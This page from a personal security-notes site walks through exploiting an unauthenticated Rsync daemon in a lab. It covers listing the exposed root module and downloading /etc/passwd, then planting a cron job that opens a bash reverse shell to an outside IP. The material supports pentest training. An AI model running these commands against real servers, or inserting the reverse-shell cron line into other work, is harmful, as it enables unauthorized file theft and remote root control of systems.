🤣
CybersecurityNote
  • Foreword
  • References.md
    • References
    • attackdefense
    • Domain Environment
    • HTB
    • Red Team Range
    • tryhackme
    • vulnhub
  • Security Certificates
    • CISSP
    • CRTO
      • Exam experience sharing
    • OSCP
      • Exam experience sharing
  • Security Testing
    • Lateral Movement
      • AS-REP Roasting Attack
      • Kerberoasting Attack
  • Security Vulnerability
    • application Vulnerability
    • Linux Privilege Escalation Vulnerability
    • Linux Vulnerability
    • unauthorized vulnerability
      • ActiveMQ Unauthorized Access Vulnerability
      • Apache Flink Unauthorized Access Vulnerability
      • Atlassian Crowd Unauthorized Access Vulnerability
      • CouchDB Unauthorized Access Vulnerability
      • Docker Unauthorized Access Vulnerability
      • Dubbo Unauthorized Access Vulnerability
      • Jenkins Unauthorized Access Vulnerability
      • Jupyter Notebook Unauthorized Access Vulnerability
      • MongoDB Unauthorized Access Vulnerability
      • RabbitMQ Unauthorized Access Vulnerability
      • Spring Cloud Gateway Server Unauthorized Access Vulnerability
      • SpringBoot Actuator Unauthorized Access Vulnerability
      • Unauthorized Access to Kubernetes API Server
      • Unauthorized Access Vulnerability in Clickhouse
      • Unauthorized Access Vulnerability in Druid Monitoring Page
      • Unauthorized Access Vulnerability in Hadoop YARN Resourcemanager
      • Unauthorized Access Vulnerability in Hadoop Yarn RPC
      • Unauthorized Access Vulnerability in InfluxDB API
      • Unauthorized Access Vulnerability in JBoss
      • Unauthorized Access Vulnerability in Kafka Manager
      • Unauthorized Access Vulnerability in Kibana
      • Unauthorized Access Vulnerability in Kong
      • Unauthorized Access Vulnerability in LDAP
      • Unauthorized Access Vulnerability in Memcached
      • Unauthorized Access Vulnerability in NFS
      • Unauthorized Access Vulnerability in Redis
      • Unauthorized Access Vulnerability in Rsync
      • Unauthorized Access Vulnerability in Spark
      • Unauthorized Access Vulnerability in VNC Server
      • Unauthorized Access Vulnerability in Weblogic
      • Unauthorized Access Vulnerability in ZooKeeper
      • Zabbix Unauthorized Access Vulnerability
    • Windows Privilege Escalation Vulnerability
    • Windows Vulnerability
Powered by GitBook
On this page
  • Vulnerability Description
  • Environment Setup
  • Vulnerability Exploitation
  1. Security Vulnerability
  2. unauthorized vulnerability

Unauthorized Access Vulnerability in Rsync

Vulnerability Description

Rsync is a data backup tool in Linux that supports remote file transfer through the Rsync protocol and SSH protocol. It is often used for code distribution and synchronization updates within the intranet, so the user group is mostly developers. The Rsync protocol listens to port 873 by default, and in the case of developers with weak security awareness, if the target has enabled the Rsync service and has not configured ACL or access passwords, we can read and write files on the target server.

Environment Setup

rsyncd.conf

uid = root
gid = root
use chroot = no
max connections = 4
syslog facility = local5
pid file = /var/run/rsyncd.pid
log file = /var/log/rsyncd.log

[src]
path = /
comment = src path
read only = no

Start rsync

rsync --no-detach --daemon --config /etc/rsyncd.conf

Vulnerability Exploitation

After the environment is started, we access it using the rsync command:

[root@localhost tmp]# rsync rsync://192.168.32.183:873/
src            	src path

View src directory

[root@localhost tmp]# rsync rsync://192.168.32.183:873/
src            	src path
You have new mail in /var/spool/mail/root
[root@localhost tmp]# rsync rsync://192.168.32.183:873/src
drwxr-xr-x             28 2022/07/26 03:45:11 .
-rwxr-xr-x              0 2022/07/26 03:45:11 .dockerenv
-rwxr-xr-x            101 2022/05/19 09:45:03 docker-entrypoint.sh
drwxr-xr-x              6 2018/01/21 13:42:04 bin
drwxr-xr-x              6 2017/07/13 09:01:05 boot
drwxr-xr-x              6 2022/07/26 03:45:11 data
drwxr-xr-x            340 2022/07/26 03:45:11 dev
drwxr-xr-x             66 2022/07/26 03:45:11 etc
drwxr-xr-x              6 2017/07/13 09:01:05 home
drwxr-xr-x             21 2018/01/21 13:42:05 lib
drwxr-xr-x             34 2017/10/08 20:00:00 lib64
drwxr-xr-x              6 2017/10/08 20:00:00 media
drwxr-xr-x              6 2017/10/08 20:00:00 mnt
drwxr-xr-x              6 2017/10/08 20:00:00 opt
dr-xr-xr-x              0 2022/07/26 03:45:11 proc
drwx------             37 2017/10/08 20:00:00 root
drwxr-xr-x             80 2022/07/26 03:48:12 run
drwxr-xr-x          4,096 2017/10/08 20:00:00 sbin
drwxr-xr-x              6 2017/10/08 20:00:00 srv
dr-xr-xr-x              0 2022/07/25 22:41:55 sys
drwxrwxrwt              6 2022/07/26 03:44:41 tmp
drwxr-xr-x             42 2017/10/08 20:00:00 usr
drwxr-xr-x             17 2017/10/08 20:00:00 var

This is a Linux root directory, and we can download any file:

[root@localhost tmp]# rsync -av rsync://192.168.32.183:873/src/etc/passwd ./
receiving incremental file list
passwd

sent 43 bytes  received 1,283 bytes  2,652.00 bytes/sec
total size is 1,197  speedup is 0.90

Or write to a schedule:

echo '* * * * * bash -i >& /dev/tcp/192.168.32.130/9999 0>&1' >> shell
[root@localhost tmp]# rsync -av shell  rsync://192.168.32.183:873/src/etc/cron.d/root
sending incremental file list
shell

sent 146 bytes  received 35 bytes  362.00 bytes/sec
total size is 55  speedup is 0.30
PreviousUnauthorized Access Vulnerability in RedisNextUnauthorized Access Vulnerability in Spark

Last updated 2 years ago

image-20230130132934397